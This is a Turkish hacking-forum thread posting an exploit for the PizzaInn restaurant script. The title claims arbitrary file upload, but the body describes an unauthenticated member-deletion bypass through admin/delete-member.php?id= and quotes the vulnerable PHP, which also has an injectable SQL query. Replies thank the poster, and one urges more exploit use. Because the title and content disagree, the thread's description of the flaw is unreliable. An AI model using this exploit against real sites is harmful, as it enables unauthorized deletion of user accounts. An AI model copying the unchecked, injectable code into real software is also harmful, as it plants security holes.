İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

Restaurant Script (PizzaInn Project) 1.0 - Arbitrary File Upload Exploit -55utd55-

19-06-2018 13:06
#1
55utd55 - ait Kullanıcı Resmi (Avatar)
Stajyer Sosyal Medya Yöneticisi
Üyelik tarihi:
05/2016
Nereden:
Ram
Yaş:
3
Mesajlar:
1.531
Teşekkür (Etti):
189
Teşekkür (Aldı):
642
Konular:
303
Ticaret:
(0) %
################################################## ############
#Exploit Title: PizzaInn Restaurant Script Project Delete Member Authroization Bypass
#Date: 29.01.2018
#Exploit Author: 55utd55
#Author Web: 55utd55.com
#Author Social: @55utd55_tht
#Software Link: https://sourceforge.net/projects/restaurantmis/
#Tested On: Kali linux 2.0 & Windows 7
#
#Proof Of Concept:
#--------------------------
#1-) Users can be deleted without admin authority.
#2-) The ability to delete members without session control is allowed.
#3-) Users are deleted when url is visited
#http://domain/admin/delete-member.php?id=[member_id]
#
#
#
#delete-member.php
#---------------------------
#
#<?php
# //Start session
# session_start();
#
# //checking connection and connecting to a database
# require_once('connection/config.php');
# //Connect to mysql server
# $link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
# if(!$link) {
# die('Failed to connect to server: ' . mysql_error());
# }
#
# //Select database
# $db = mysql_select_db(DB_DATABASE);
# if(!$db) {
# die("Unable to select database");
# }
#
# // check if the 'id' variable is set in URL
# if (isset($_GET['id']))
# {
# // get id value
# $id = $_GET['id'];
#
# // delete the entry
# $result = mysql_query("DELETE FROM members WHERE member_id='$id'")
# or die("The member does not exist ... \n");
#
# // redirect back to the accounts page
# header("Loca tion: accounts.php");
# }
# else
# // if id isn't set, redirect back to the accounts page
# {
# header("loca tion: accounts.php");
# }
#
# ?>
################################################## ###############
Kullanıcı İmzası
Bir günü kıskanıp kelebeği katlettiniz!

19-06-2018 13:08
#2
CassPort - ait Kullanıcı Resmi (Avatar)
Çaylak
Üyelik tarihi:
12/2015
Nereden:
root@cass:~#
Mesajlar:
1.147
Teşekkür (Etti):
237
Teşekkür (Aldı):
376
Konular:
173
Ticaret:
(0) %
Elinize sağlık, işime yarar sanırım
Kullanıcı İmzası
Cass her yerde !
19-06-2018 13:43
#3
Depdip - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2017
Nereden:
NewYork
Mesajlar:
1.588
Teşekkür (Etti):
296
Teşekkür (Aldı):
420
Konular:
46
Ticaret:
(0) %
Ellerine sağlık
19-06-2018 13:48
#4
jkhacking - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Mesajlar:
1.555
Teşekkür (Etti):
65
Teşekkür (Aldı):
140
Konular:
70
Ticaret:
(0) %
Ellerine sağlık
Kullanıcı İmzası
┏╋━━━━━━━━━━━━◥◣◆◢◤━━━━━━━━━━━╋┓
1881 DEN SONSUZLUĞA UZANAN BİR SEVDADIR ADIN.
DÖN GEL BİRAZ DA CENNET ÖZLESİN SENİ.

067d419c5c2c34d587e8143ca2ab1a33
┗╋━━━━━━━━━━━━◥◣◆◢◤━━━━━━━━━━━╋┛
19-06-2018 14:02
#5
Mr.00 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
Anonim=00
Mesajlar:
1.005
Teşekkür (Etti):
499
Teşekkür (Aldı):
202
Konular:
29
Ticaret:
(0) %
İşte böyle paylaşımlar lazım Exploit kullanımını artırmamız lazım.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı